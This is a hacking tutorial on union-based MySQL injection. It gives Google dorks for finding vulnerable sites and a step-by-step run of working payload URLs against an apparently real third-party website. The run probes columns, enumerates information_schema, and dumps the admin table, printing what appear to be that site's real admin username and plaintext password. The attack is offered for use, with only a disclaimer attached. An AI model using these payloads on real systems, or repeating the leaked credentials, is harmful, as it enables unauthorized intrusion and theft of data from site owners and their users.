Union Based MySQL Injection | SQL Injection



Union Based MySQL Injection Tutorial

Short Introduction :

What is SQL Injection?
SQL injection is one of the popular web application hacking method.  Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.
What a hacker can do with SQL Injection attack?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
Shutting down the My SQL server
For Searching Website Vulnerable To SQL Injection Attacks You Can Use Google Search Engine.
By Searching Keywords Known As "Google Dorks"
Some Most Known Dorks :
* inurl:gallery.php?id=
* inurl:photo.php?id=
* inurl:news.php?id=
* inurl:details.php?id=
* inurl:product.php?cat=

Difference Between Integer And String Based SQL Injection :

Integer :
SELECT * FROM pages WHERE page_id=10 [inject]  

So the injection would be
test.php?id=1 union select 1,2,3--
Finally you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3--


String : 

SELECT * FROM pages WHERE page_id="10" [inject]

So the injection would be
test.php?id=1' union select 1,2,3--+
Finally you Get:
Select * from pages where page_id="10"' union select 1,2,3--+ 

So in integer based SQL injection you dont have to put a ' and in string based SQL injection you have to put a ' and a + sign at the End. 

Quick Tutorial On Union Based SQL Injection : (Basic Injection For Noob To Leet)

http://www.txi.co.in/article.php?id=2 

By adding ' in the end we check if the site is vulnerable or not like this 

http://www.txi.co.in/article.php?id=2'    you can see Error in the middle ..

After Checking Vulnerability .. 
Its Time To Find The Number of columns:
The number of columns present in the target database. 
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,5,6,...n. Until you get the error like "unknown column ".
For eg:
http://www.site.com/index.php?id=2 order by 1

http://www.site.com/index.php?id=2 order by 2

http://www.site.com/index.php?id=2 order by 3
http://www.site.com/index.php?id=2 order by 4
Like This :-

http://txi.co.in/article.php?id=2' order by 1--+  (NO ERROR)
http://txi.co.in/article.php?id=2' order by 2--+  (NO ERROR)
http://txi.co.in/article.php?id=2' order by 3--+  (NO ERROR)
http://txi.co.in/article.php?id=2' order by 4--+  (NO ERROR)
http://txi.co.in/article.php?id=2' order by 5--+  (ERROR)

We are getting An error on order by 5--+
That means the site has only 4 columns ,,

 Now,
We will do UNION Selection :-

http://txi.co.in/article.php?id=2' and 0 union select 1,2,3,4--+    

(we select 4 columns because the website has 4 columns as we are getting an error on 'order by 5--+')   and we use " and 0 " for falsing the query.. We can also use " div 0 " , " and false " etc ..

After that a num will show on the screen ... Like here 2 and 3 showing .. 
means 2 and 3 are the vulnerable columns ..

now replace 2(the vulnerable Column) with " group_concat(table_name) " 
And in the end .. write " from information_Schema.tables where table_schema=database() "
Like this .. 

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(table_name),3,4 from information_Schema.tables where table_schema=database()--+

here ,we got all tables in the current database..

We need admin username and password for login .. it should be in admin table..
Note :: admin tables are named differently sometimes ... like (users , adminlogin , user_login , etc etc )

here we have the admin table named " admin  "

Now For Getting Columns Of Table We use ... 

Replace "group_concat(table_name)" to " group_concat(column_name)"

and in the end write.. 
" from information_schema.columns where table_name=(HEX VALUE OF TABLE)--+ "
( You can use Hackbar (Firefox Addon) For Converting Table Name Into HEX ) 

Like This ..

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(column_name),3,4 from information_Schema.columns where table_name=0x61646d696e--+

Hex Value Of Admin Is .. 0x61646d696e  ( i used Hackbar )

Now We Got All Columns Of That Table ..

To Dump the Data From columns We Will Use :

Replace "group_concat(column_name)" with "group_concat(column_name1 , 0x203a20 , column_name2)" 
and in the end write
from "Table Name Here"--+

Like This :

http://txi.co.in/article.php?id=2' and 0 union select 1,group_concat(login,0x3a,password),3,4 from admin--+

Here We Got The Username And Password ;) ;)
Username : admin
Password : sairarehman

Do Same For All Columns And Tables .. Just Check The Name Of Tables / Columns Carefully :)

Thanks For Reading !

Note : This Is Purely For Sharing Knowledge . We Are Not Responsible For Actions Performed By You.